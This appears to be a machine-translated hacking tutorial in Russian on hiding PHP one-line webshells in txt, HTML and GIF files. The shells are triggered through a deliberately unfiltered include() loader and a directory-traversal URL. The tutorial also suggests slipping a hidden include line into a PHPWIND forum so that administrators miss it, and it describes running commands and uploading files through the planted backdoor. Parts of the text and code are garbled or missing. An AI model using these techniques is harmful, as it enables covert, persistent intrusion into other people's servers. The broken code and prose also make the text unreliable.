Недавно многие друзья спрашивали меня, могу ли я скрыть свой троян, состоящий из одного предложения, в HTML или изображениях. На самом деле, вставка трояна, состоящего из одного предложения, в файлы PHP уже очень скрыта. Если я настаиваю на помещении его в файлы HTML или изображения, Давайте продолжим читать этот отчет об испытаниях. Вы должны знать, что если вы просто поместите оператор PHP в изображение, он все равно не будет выполнен, поскольку PHP анализирует только файлы с расширением php. Поэтому необходимо иметь возможность выполнять операторы PHP, скрытые на картинке. Мы просто используем вызывающие функции в PHP: include, require и т.д.
Мы до сих пор помним статью о сокрытии троянов на картинках, вышедшую несколько дней назад. То есть используйте такие операторы, как include("x.gif") в файле PHP, для вызова операторов троянского коня, скрытых в изображении. Утверждения в ASP аналогичны. Оно кажется очень скрытым, но если вызвать изображение напрямую, тому, кто немного разбирается в PHP, не составит труда найти что-то подозрительное. Поскольку передать параметры с помощью метода GET в URL-адресе сложно, производительность внедрения троянской программы не может быть полностью использована.
Функция Include часто используется в PHP, поэтому она вызывает слишком много проблем с безопасностью. Например, уязвимость PHPWIND1.36 вызвана отсутствием фильтрации переменных, стоящих за включением. На основе этого мы можем создавать аналогичные операторы для вставки в файлы PHP. Затем спрячьте трояна в изображении или HTML-файле, который, можно сказать, более скрытен. Например, вставьте следующий оператор в форум PHPWIND: < ''?@include includ/.$PHPWIND_ROOT;? >Общие администраторы не смогут его увидеть.
С помощью функции включения мы можем скрыть PHP-трояны во многих типах файлов, таких как txt, html и файлы изображений. Поскольку эти три типа файлов — txt, html и файлы изображений — наиболее распространены на форумах и в системах статей, мы проведем тесты по порядку ниже.
Сначала создайте PHP-файл test.php. Содержимое файла:
$test=$_GET['test'];
@include 'test/'.$test;
?>
Txt-файлы обычно представляют собой файлы описаний, поэтому мы помещаем их в файл. Троян, состоящий из одного предложения. Можно перейти к файлу описания каталога. Просто создайте TXT-файл t.txt. Вставляем трояна, состоящего из одного предложения, в файл t.txt. Затем посетите http://localhost/test/test.php?test=../t.txt. Если вы видите содержимое t.txt, все в порядке. Затем добавьте адрес трояна бэкдор-клиента lanker mini PHP в http Just. добавьте cmd к паролю ://localhost/test/test.php?test=../t.txt , и вы сможете увидеть результаты, возвращаемые выполнением.
HTML-файлы обычно представляют собой файлы шаблонов. Чтобы троянский конь, вставленный в HTML-файл, мог вызываться и выполняться без отображения, мы можем добавить в HTML текстовое поле со скрытыми атрибутами, например: Затем используйте тот же метод, что и выше. Возвращаемые результаты выполнения обычно можно увидеть, просмотрев исходный файл. Например, воспользуйтесь функцией просмотра каталога этой программы. Просматривая содержимое исходного файла, я могу получить каталог C:Uniserver2_7swwwtest.
Теперь поговорим о файлах изображений. Самый ядовитый трюк — спрятать троянского коня в изображении. Мы можем напрямую отредактировать изображение и вставить его в конец изображения.
После тестирования это обычно не повлияет на изображение. Затем таким же образом добавьте адрес клиентского трояна
и проверим переменные среды PHP. В результате будет получено исходное изображение.
Между результатами здесь и тем, что мы себе представляли, могут быть некоторые различия. На самом деле команда была запущена, но возвращенные результаты не видны. Поскольку это настоящий файл GIF, возвращаемые результаты не будут отображаться. докажем, действительно ли она выполнена. После получения команды выполняем команду загрузки файла. Как и ожидалось, файл успешно загружен на сервер. Преимущество такой подделки в том, что она хорошо скрывается. Излишне говорить, что недостатком является отсутствие реакции. Если вы хотите увидеть возвращаемые результаты, достаньте Блокнот и создайте поддельный файл изображения.
На этом тест в основном завершен. Как скрыть бэкдор PHP, зависит от вашего собственного выбора. Пишу в спешке, если что-то не так, укажите!